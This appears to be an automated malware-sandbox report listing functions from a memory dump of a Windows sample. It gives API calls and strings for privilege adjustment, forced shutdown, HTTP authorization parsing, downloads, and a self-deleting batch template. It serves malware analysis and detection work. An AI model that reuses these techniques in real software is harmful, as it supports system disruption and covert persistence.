Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

memset.MSVCRT ref: 00C4D15A
memcpy.MSVCRT ref: 00C4D16A

Part of subcall function 00C29A2A: CryptDestroyHash.ADVAPI32 ref: 00C29A42
Part of subcall function 00C29A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C29A53

Part of subcall function 00C29B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00C29B41

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 00C4448B
GetFileAttributesW.KERNEL32(?), ref: 00C444B8
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C444CC
SetLastError.KERNEL32(00000050), ref: 00C444EF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2A46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 00C2A47C
memset.MSVCRT ref: 00C2A4BF
memset.MSVCRT ref: 00C2A4F5

Strings

8, xrefs: 00C2A4B3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5E290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C5EC47
UnhandledExceptionFilter.KERNEL32(00C24D1C), ref: 00C5EC52
GetCurrentProcess.KERNEL32 ref: 00C5EC5D
TerminateProcess.KERNEL32 ref: 00C5EC64

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E38C, Relevance: 7.2, APIs: 4, Instructions: 45

APIs

GetLastError.KERNEL32(?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E390

Part of subcall function 0351E267: TlsGetValue.KERNEL32(?,0351E3A3), ref: 0351E270
Part of subcall function 0351E267: DecodePointer.KERNEL32(?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E282
Part of subcall function 0351E267: TlsSetValue.KERNEL32 ref: 0351E291

SetLastError.KERNEL32(?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E3FA

Part of subcall function 0351FF25: Sleep.KERNEL32(00000000), ref: 0351FF4D

DecodePointer.KERNEL32(?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E3CC
GetCurrentThreadId.KERNEL32 ref: 0351E3E2

Part of subcall function 0351FE47: HeapFree.KERNEL32(00000000,00000000,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE5D
Part of subcall function 0351FE47: GetLastError.KERNEL32(?,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE6F

Part of subcall function 0351E2D8: GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0351E2E9
Part of subcall function 0351E2D8: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 0351E32A

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C3506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C3507A
Thread32First.KERNEL32(?,?), ref: 00C35095
Thread32Next.KERNEL32(?,?), ref: 00C350A8
CloseHandle.KERNEL32 ref: 00C350B3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 00C43EFF: CharLowerW.USER32(?), ref: 00C43FBA

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

ExitWindowsEx.USER32(00000014,80000000), ref: 00C5228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00C522CF

Part of subcall function 00C39C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39CCE
Part of subcall function 00C39C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D17
Part of subcall function 00C39C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39D3E
Part of subcall function 00C39C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D87
Part of subcall function 00C39C8D: SetEvent.KERNEL32 ref: 00C39D9A
Part of subcall function 00C39C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C39DAD
Part of subcall function 00C39C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39DF1
Part of subcall function 00C39C8D: CharToOemW.USER32(?,?), ref: 00C39E6F
Part of subcall function 00C39C8D: CharToOemW.USER32(?,?), ref: 00C39E81
Part of subcall function 00C39C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00C39EEC

Part of subcall function 00C4582C: EnterCriticalSection.KERNEL32(Function_00043510,?,?,?,00C3E9BA), ref: 00C45842
Part of subcall function 00C4582C: LeaveCriticalSection.KERNEL32(Function_00043510,?,?,?,00C3E9BA), ref: 00C45868
Part of subcall function 00C4582C: CreateMutexW.KERNEL32(00C62974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00C4587A

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 00C522E2

Part of subcall function 00C350C0: GetCurrentThread.KERNEL32 ref: 00C350D4
Part of subcall function 00C350C0: OpenThreadToken.ADVAPI32 ref: 00C350DB
Part of subcall function 00C350C0: GetCurrentProcess.KERNEL32 ref: 00C350EB
Part of subcall function 00C350C0: OpenProcessToken.ADVAPI32 ref: 00C350F2
Part of subcall function 00C350C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00C35113
Part of subcall function 00C350C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00C35128
Part of subcall function 00C350C0: GetLastError.KERNEL32 ref: 00C35132
Part of subcall function 00C350C0: CloseHandle.KERNEL32(00000001), ref: 00C35143

Part of subcall function 00C4407B: memcpy.MSVCRT ref: 00C4409B

Strings

SeShutdownPrivilege, xrefs: 00C522B1

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 00C529AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,00C4FF4F,?,?,?,00002710,?,?), ref: 00C529CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 00C52A12

Strings

, xrefs: 00C529F3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C531E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(Function_00043510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(Function_00043510,?,00000000), ref: 00C5278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 00C5320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,00C50029,?,?,?,?), ref: 00C5321B

Strings

0, xrefs: 00C531FD
0:0, xrefs: 00C53215

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 00C52DF0
WSASetLastError.WS2_32(00002775), ref: 00C52E54

Strings

, xrefs: 00C52E18

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 00C31DCD

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C2F040: memcmp.MSVCRT ref: 00C2F0B6

Part of subcall function 00C2EEA9: memcpy.MSVCRT ref: 00C2EED2

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

memset.MSVCRT ref: 00C31E71
memcpy.MSVCRT ref: 00C31E84
memcpy.MSVCRT ref: 00C31EA6
memcpy.MSVCRT ref: 00C31EC6

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Part of subcall function 00C2C907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C961
Part of subcall function 00C2C907: InterlockedIncrement.KERNEL32 ref: 00C2C99E
Part of subcall function 00C2C907: SetEvent.KERNEL32 ref: 00C2C9BC
Part of subcall function 00C2C907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C9C9

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E6AF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00C2E6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00C2E6DC

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E632
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E645
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E658
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E663
Part of subcall function 00C2E5F1: GetFileTime.KERNEL32(?,?,?), ref: 00C2E687
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C2E6B2 00C2E6B3 00C2E6B9 00C2E6DB

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C392DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 00C392F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00C39314

Part of subcall function 00C393E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,00C39326,?,?,00000000), ref: 00C39412
Part of subcall function 00C393E9: memcpy.MSVCRT ref: 00C39432
Part of subcall function 00C393E9: memcpy.MSVCRT ref: 00C3946A
Part of subcall function 00C393E9: memcpy.MSVCRT ref: 00C39482

Strings

<, xrefs: 00C3930D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C395BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00C5363C
Part of subcall function 00C53629: GetLastError.KERNEL32(?,00C35032,?,00000008,?,?,?,?,?,?,00C449E1,?,?,00000001), ref: 00C53646
Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00C5366E

EqualSid.ADVAPI32(?,5B867A00), ref: 00C395E1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C352FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 00C3530F
Part of subcall function 00C352FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00C3532D
Part of subcall function 00C352FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00C35339
Part of subcall function 00C352FF: memset.MSVCRT ref: 00C35379
Part of subcall function 00C352FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00C353C6
Part of subcall function 00C352FF: CloseHandle.KERNEL32(?), ref: 00C353DA
Part of subcall function 00C352FF: CloseHandle.KERNEL32(?), ref: 00C353E0
Part of subcall function 00C352FF: FreeLibrary.KERNEL32 ref: 00C353F4

CloseHandle.KERNEL32(00000001), ref: 00C39628

Strings

"%s", xrefs: 00C395F5

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C467C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

memcmp.MSVCRT ref: 00C467F4

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

memcmp.MSVCRT ref: 00C46859

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memset.MSVCRT ref: 00C468ED
memcpy.MSVCRT ref: 00C4691A
memcmp.MSVCRT ref: 00C46952

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2EE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 00C2EE1C
memcpy.MSVCRT ref: 00C2EE37
memcpy.MSVCRT ref: 00C2EE5F
memcpy.MSVCRT ref: 00C2EE83

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C37DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E07
InterlockedIncrement.KERNEL32(?,?), ref: 00C37E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E62

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2F5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C4CFF2: memset.MSVCRT ref: 00C4D01A

memcpy.MSVCRT ref: 00C2F79E

Part of subcall function 00C4D06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C4D07B

memcpy.MSVCRT ref: 00C2F719
memcpy.MSVCRT ref: 00C2F731

Part of subcall function 00C4D17E: memcpy.MSVCRT ref: 00C4D19E
Part of subcall function 00C4D17E: memcpy.MSVCRT ref: 00C4D1CA

memcpy.MSVCRT ref: 00C2F78D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35AD5, Relevance: 6.3, APIs: 3, Instructions: 10

APIs

GetLastError.KERNEL32(?,00C2BA1E), ref: 00C35AD6
TlsSetValue.KERNEL32(00000000), ref: 00C35AE6
SetLastError.KERNEL32(?,?,00C2BA1E), ref: 00C35AED

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C40181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 00C53CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00C53D14
Part of subcall function 00C53CFF: lstrcmpA.KERNEL32(Basic ,?,00C401C0,00000006,Authorization,?,?,?), ref: 00C53D1E

StrChrA.SHLWAPI(?,0000003A), ref: 00C40212

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

Authorization, xrefs: 00C40191
Basic , xrefs: 00C401B6

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2A509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C2A54A

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

PathRenameExtensionW.SHLWAPI(?,?), ref: 00C2A59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C2A56B

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2BBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 00C2B6D0: EnterCriticalSection.KERNEL32(00C63510,?,00C2BBBB,00F41E90,?,00C31983,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2B6E0
Part of subcall function 00C2B6D0: LeaveCriticalSection.KERNEL32(00C63510,?,00C31983,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2B715

VerQueryValueW.VERSION(?,00C275E4,?,?,00F41E90,?,00C31983,?,?,?,?,?,?,00C448EB), ref: 00C2BBCE
GetModuleHandleW.KERNEL32(?), ref: 00C2BC0F

Part of subcall function 00C2BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00C2BC6B

Strings

4, xrefs: 00C2BBD9

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E2D8, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 40

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0351E2E9

Part of subcall function 0351EB3A: EnterCriticalSection.KERNEL32(?,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351EB64

InterlockedIncrement.KERNEL32(?,?,00000000), ref: 0351E32A

Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,00000001,?), ref: 0351FFD1
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFDE
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFEB
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFF8
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520005
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520021
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520031
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520047

Strings

KERNEL32.DLL, xrefs: 0351E2E4

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C446CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C4470E

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

Part of subcall function 00C44214: EnterCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C4422E
Part of subcall function 00C44214: LeaveCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C44261
Part of subcall function 00C44214: CoTaskMemFree.OLE32(00000000), ref: 00C442F6
Part of subcall function 00C44214: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44303
Part of subcall function 00C44214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C4431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C446D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C446EE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C393E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,00C39326,?,?,00000000), ref: 00C39412
memcpy.MSVCRT ref: 00C39432
memcpy.MSVCRT ref: 00C3946A
memcpy.MSVCRT ref: 00C39482

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 00C31BE7
#2.OLEAUT32(ProhibitDTD), ref: 00C31BF5

Strings

ProhibitDTD, xrefs: 00C31BF0

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2F20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 00C2F219
memcpy.MSVCRT ref: 00C2F23A
memcpy.MSVCRT ref: 00C2F260
memcpy.MSVCRT ref: 00C2F284

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C51E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00C2CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00C51E9C
memcmp.MSVCRT ref: 00C51EC8
memcpy.MSVCRT ref: 00C51F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00C51F1F

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C41215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 00C4122B
InitializeCriticalSection.KERNEL32(00C62910), ref: 00C4123B

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

memset.MSVCRT ref: 00C4126A
InitializeCriticalSection.KERNEL32(00C628F0), ref: 00C41274

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3BFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 00C3C0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 00C3C10C

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Part of subcall function 00C3CC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 00C3CDAF

Part of subcall function 00C35A9B: GetLastError.KERNEL32(?,00000000,00C3C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00C35A9D
Part of subcall function 00C35A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 00C35ABA
Part of subcall function 00C35A9B: SetLastError.KERNEL32(?,?,00000000,00C3C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00C35ACA

Part of subcall function 00C35A4F: GetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A51
Part of subcall function 00C35A4F: TlsGetValue.KERNEL32(?,?,00C2B9B4), ref: 00C35A6E
Part of subcall function 00C35A4F: TlsSetValue.KERNEL32(00000001), ref: 00C35A80
Part of subcall function 00C35A4F: SetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A90

Part of subcall function 00C35AD5: GetLastError.KERNEL32(?,00C2BA1E), ref: 00C35AD6
Part of subcall function 00C35AD5: TlsSetValue.KERNEL32(00000000), ref: 00C35AE6
Part of subcall function 00C35AD5: SetLastError.KERNEL32(?,?,00C2BA1E), ref: 00C35AED

Part of subcall function 00C37DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E07
Part of subcall function 00C37DF0: InterlockedIncrement.KERNEL32(?,?), ref: 00C37E5B
Part of subcall function 00C37DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E62

Part of subcall function 00C37E75: EnterCriticalSection.KERNEL32(00000014,00000000,00000001,?,00000000,00C3C026,00000001,?), ref: 00C37E8F
Part of subcall function 00C37E75: LeaveCriticalSection.KERNEL32(00000014,?,?,?), ref: 00C37EBE

Strings

d, xrefs: 00C3BFE8
n, xrefs: 00C3BFF5

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351FC8F, Relevance: 6.1, APIs: 4, Instructions: 116

APIs

Part of subcall function 0351F986: InterlockedDecrement.KERNEL32(?,0353EFD8,0000000C), ref: 0351F9DF
Part of subcall function 0351F986: InterlockedIncrement.KERNEL32(0355A047,0353EFD8,0000000C), ref: 0351FA0A

Part of subcall function 0351FA2A: GetOEMCP.KERNEL32 ref: 0351FA53
Part of subcall function 0351FA2A: GetACP.KERNEL32 ref: 0351FA76

Part of subcall function 0351FEE0: Sleep.KERNEL32(00000000), ref: 0351FF01

Part of subcall function 0351FAA6: IsValidCodePage.KERNEL32 ref: 0351FB19
Part of subcall function 0351FAA6: GetCPInfo.KERNEL32(?,?), ref: 0351FB2C

InterlockedDecrement.KERNEL32(FFFFF075,0353EFF8,00000014), ref: 0351FD05
InterlockedIncrement.KERNEL32 ref: 0351FD2A

Part of subcall function 0351EB3A: EnterCriticalSection.KERNEL32(?,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351EB64

InterlockedDecrement.KERNEL32 ref: 0351FDBC
InterlockedIncrement.KERNEL32 ref: 0351FDE0

Part of subcall function 0351FE47: HeapFree.KERNEL32(00000000,00000000,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE5D
Part of subcall function 0351FE47: GetLastError.KERNEL32(?,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE6F

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C39067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 00C3908C

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

InternetReadFile.WININET(00C3388E,?,00001000,?), ref: 00C390DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00C390BB

Part of subcall function 00C36AAB: memcpy.MSVCRT ref: 00C36AD1

